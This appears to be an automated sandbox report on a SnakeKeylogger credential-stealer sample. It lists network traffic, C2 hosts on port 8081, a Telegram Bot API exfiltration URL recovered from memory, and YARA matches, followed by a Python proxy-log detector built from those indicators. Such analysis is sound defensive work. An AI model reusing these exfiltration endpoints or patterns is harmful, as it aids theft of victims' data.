Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 11 Oct 2024 07:35:30 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 11 Oct 2024 07:35:32 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000031E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: ZOlmYtPdlO.exe, 00000010.00000002.4153230560.00000000068E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft.c62
Source: rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1765638038.0000000002867000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000000.00000002.1732739844.0000000005DA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003220000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enp
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003256000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/p
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
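The network indicators listed above (the `_send_.php` endpoint on port 8081, the three dynamic-DNS C2 hosts, the `checkip.dyndns.org` and `reallyfreegeoip.org/xml/` lookups, and the Telegram Bot API `sendMessage` string) can be turned into a simple proxy-log check. The following is an added example written for this page, not code from the sandbox report or from the malware; the log line format and the sample log lines are constructed for the example, and only the host names, port, path and URL patterns are taken from the findings above.

```python
"""Match the C2 / exfiltration indicators recorded in this report against proxy log lines.

Added example (not part of the sandbox report). Indicators are copied from the
"String found in binary or memory" entries: the POST endpoint /_send_.php on port 8081,
the dynamic-DNS hosts aborters.duckdns.org, anotherarmy.dns.army, varders.kozow.com and
the IP 51.38.247.67, the public-IP / geolocation lookups, and the Telegram Bot API URL.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the report entries above.
C2_HOSTS = {"aborters.duckdns.org", "anotherarmy.dns.army", "varders.kozow.com", "51.38.247.67"}
C2_PORT = 8081
C2_PATH = "/_send_.php"
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}
TELEGRAM_HOST = "api.telegram.org"
# The string found in memory has an empty token ("/bot/sendMessage"), so the token group may be empty.
TELEGRAM_BOT_RE = re.compile(r"^/bot([^/]*)/sendMessage$")

# Assumed (constructed) log layout: "<timestamp> <client-ip> <method> <url> <status>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


@dataclass(frozen=True)
class Hit:
    line_no: int
    category: str
    detail: str


def classify_url(url: str) -> Optional[Tuple[str, str]]:
    """Return (category, detail) when the URL matches one of the report's indicators, else None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if host == TELEGRAM_HOST:
        m = TELEGRAM_BOT_RE.match(parts.path)
        if m:
            # parse_qs drops blank values, so an empty chat_id (as in the report) reads as "<empty>".
            chat_id = parse_qs(parts.query).get("chat_id", [""])[0] or "<empty>"
            return ("telegram_exfil", f"chat_id={chat_id} token_len={len(m.group(1))}")
        return ("telegram_api", parts.path)
    if host in IP_LOOKUP_HOSTS:
        return ("ip_geolocation_lookup", host + parts.path)
    if host in C2_HOSTS or (port == C2_PORT and parts.path == C2_PATH):
        return ("http_c2", f"{host}:{port}{parts.path}")
    return None


def scan_proxy_log(lines: Iterable[str]) -> List[Hit]:
    """Parse each log line and collect the ones whose URL matches an indicator."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        result = classify_url(m.group("url"))
        if result:
            hits.append(Hit(n, result[0], f"{m.group('method')} {result[1]}"))
    return hits


def summarize(hits: Iterable[Hit]) -> Dict[str, int]:
    """Count hits per category, e.g. to drive an alert threshold."""
    return dict(Counter(h.category for h in hits))


# Constructed sample log (not from the report); URLs mirror the indicators listed above.
SAMPLE_LOG = [
    "2024-10-11T07:35:30Z 192.168.2.4 GET http://checkip.dyndns.org/ 200",
    "2024-10-11T07:35:31Z 192.168.2.4 GET https://reallyfreegeoip.org/xml/8.46.123.33 200",
    "2024-10-11T07:35:32Z 192.168.2.4 GET https://api.telegram.org/bot/sendMessage?chat_id=&text=PC%20Name 404",
    "2024-10-11T07:35:40Z 192.168.2.4 POST http://aborters.duckdns.org:8081/_send_.php 000",
    "2024-10-11T07:35:41Z 192.168.2.4 POST http://51.38.247.67:8081/_send_.php 000",
    "2024-10-11T07:36:00Z 192.168.2.4 GET https://www.office.com/ 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.category}: {hit.detail}")
    print(summarize(scan_proxy_log(SAMPLE_LOG)))
```

The sequence the constructed log reproduces (public-IP lookup, geolocation of that IP, then a Telegram `sendMessage` call and POSTs to `/_send_.php` on 8081) is the order a practitioner would look for in real proxy data; a single IP-lookup hit on its own is weak, while an IP lookup followed by a `/bot.../sendMessage` request or a POST to a dynamic-DNS host on 8081 from the same client is worth an alert.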

System Summary

Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
